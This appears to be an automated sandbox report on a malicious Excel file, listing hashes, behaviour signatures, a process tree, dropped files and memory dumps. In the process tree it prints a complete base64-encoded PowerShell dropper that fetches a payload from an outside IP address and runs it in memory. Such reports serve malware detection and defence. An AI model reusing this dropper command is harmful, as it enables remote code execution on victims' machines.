Analysis

  • max time kernel
    47s
  • max time network
    35s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64 arch:x86 image:win10v2004-20241007-en locale:en-us os:windows10-2004-x64 system
  • submitted
    13-11-2024 22:05

General

  • Target

    e0ea4752bd671d195f53c4699aa6a2e169c2026a73f153f9bcad66cb59355160.xls

  • Size

    46KB

  • MD5

    4cb9e433653daf1ac21b6852e6fa6fd6

  • SHA1

    0a98f758d62251129c9ac997fe3d7c43cdccd3d6

  • SHA256

    e0ea4752bd671d195f53c4699aa6a2e169c2026a73f153f9bcad66cb59355160

  • SHA512

    1bb0ffb07d750ce1f6720b05e67b9a06d8dd7fa7274afee511cc7983778a11493a39621585bf9c174e89e6e45eaf34961ce5aa129da82fc082d3dcbb744acb6c

  • SSDEEP

    768:I4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:DSFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\e0ea4752bd671d195f53c4699aa6a2e169c2026a73f153f9bcad66cb59355160.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4544
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHI
AdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4572
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1y5lnxos\1y5lnxos.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:452
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9BE2.tmp" "c:\Users\Admin\AppData\Local\Temp\1y5lnxos\CSC275C9672D2AB484FAF8EF19AEAC0D2C1.TMP"
          4⤵
          PID:3044

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\1y5lnxos\1y5lnxos.dll

      Filesize

      3KB

      MD5

      8f1548d0c4c1acad2f955707e5c970ce

      SHA1

      77eef5bbb4cadbf006a4ce11de4752a87b23cc41

      SHA256

      08eb795088187c65fc958985ade130d2fad8b396d9798b24e3958fa076c977d6

      SHA512

      8814dc843ad777662e8a89c0bf8be43288a759ba3079d4ae69bf056e4b47448c4cbcef52d50debb78882a7c4c10e5c18c4060f7c9f66086c440b44e03d6f9310

    • C:\Users\Admin\AppData\Local\Temp\RES9BE2.tmp

      Filesize

      1KB

      MD5

      560c5270f75ee32d921b2d1e49eaa09b

      SHA1

      3cbaff88fd668910b3d6977ea65bf4eac5ec99c5

      SHA256

      15f7d3d74d36e882f379d31ca2511976843434aaee1afdc89a85e637158834a3

      SHA512

      6be8f9e594b2d7c56952433124850ea33d1a919c2fd4fa79369a629f51967cad16a21fd8ac7de47b85d2518fde1b40baad605b68635617a5c5289e5cccd9befb

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xpkbppz3.fii.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • \??\c:\Users\Admin\AppData\Local\Temp\1y5lnxos\1y5lnxos.0.cs

      Filesize

      631B

      MD5

      f4dd5c682eb7b3b679f084261bfc7c4c

      SHA1

      70f75d7a4e42c185eb09139ed3c6f7338a2219c2

      SHA256

      2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

      SHA512

      8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

    • \??\c:\Users\Admin\AppData\Local\Temp\1y5lnxos\1y5lnxos.cmdline

      Filesize

      369B

      MD5

      cbb7714d772971b641a3918a36d06afb

      SHA1

      dab9deb0ee5726a4837f354291e456e6e600b7be

      SHA256

      dd023a41124933ada36d5c14db5f1e8940a90ed111876f1d90e4748949c72581

      SHA512

      c103d73a915ae161c6e42840afa2bdab70292074507b6251f05fbde8735790c5aa4af0470d60067bb8e713224495f23a675fdb985aa94aa897f2c811665cad2b

    • \??\c:\Users\Admin\AppData\Local\Temp\1y5lnxos\CSC275C9672D2AB484FAF8EF19AEAC0D2C1.TMP

      Filesize

      652B

      MD5

      215a91ea9fecbeac1580e17457437006

      SHA1

      4261d44fe704b520769e28e5c19fb81e6bafcd21

      SHA256

      10b402535098ef72a345aba1be929b03e907845ee103c72b84f392722a26e3b3

      SHA512

      94cf1d0ebcfea03823aaee989a8900b9c47113a5cbe3aaa324dbd15ab22e9f65b50eeec315828a65ef6cc49b2a88edc3c878d81cce3dd1210a86ea71899151dc

    • memory/4544-10-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-25-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-0-0x00007FFA3C650000-0x00007FFA3C660000-memory.dmp

      Filesize

      64KB

    • memory/4544-12-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-13-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-14-0x00007FFA3A3E0000-0x00007FFA3A3F0000-memory.dmp

      Filesize

      64KB

    • memory/4544-11-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-9-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-15-0x00007FFA3A3E0000-0x00007FFA3A3F0000-memory.dmp

      Filesize

      64KB

    • memory/4544-8-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-17-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-16-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-24-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-7-0x00007FFA3C650000-0x00007FFA3C660000-memory.dmp

      Filesize

      64KB

    • memory/4544-66-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-6-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-5-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-4-0x00007FFA3C650000-0x00007FFA3C660000-memory.dmp

      Filesize

      64KB

    • memory/4544-2-0x00007FFA3C650000-0x00007FFA3C660000-memory.dmp

      Filesize

      64KB

    • memory/4544-3-0x00007FFA3C650000-0x00007FFA3C660000-memory.dmp

      Filesize

      64KB

    • memory/4544-1-0x00007FFA7C66D000-0x00007FFA7C66E000-memory.dmp

      Filesize

      4KB

    • memory/4544-62-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-59-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-61-0x00007FFA7C5D0000-0x00007FFA7C7C5000-memory.dmp

      Filesize

      2.0MB

    • memory/4544-60-0x00007FFA7C66D000-0x00007FFA7C66E000-memory.dmp

      Filesize

      4KB

    • memory/4572-55-0x0000023C66710000-0x0000023C66718000-memory.dmp

      Filesize

      32KB

    • memory/4572-30-0x0000023C666E0000-0x0000023C66702000-memory.dmp

      Filesize

      136KB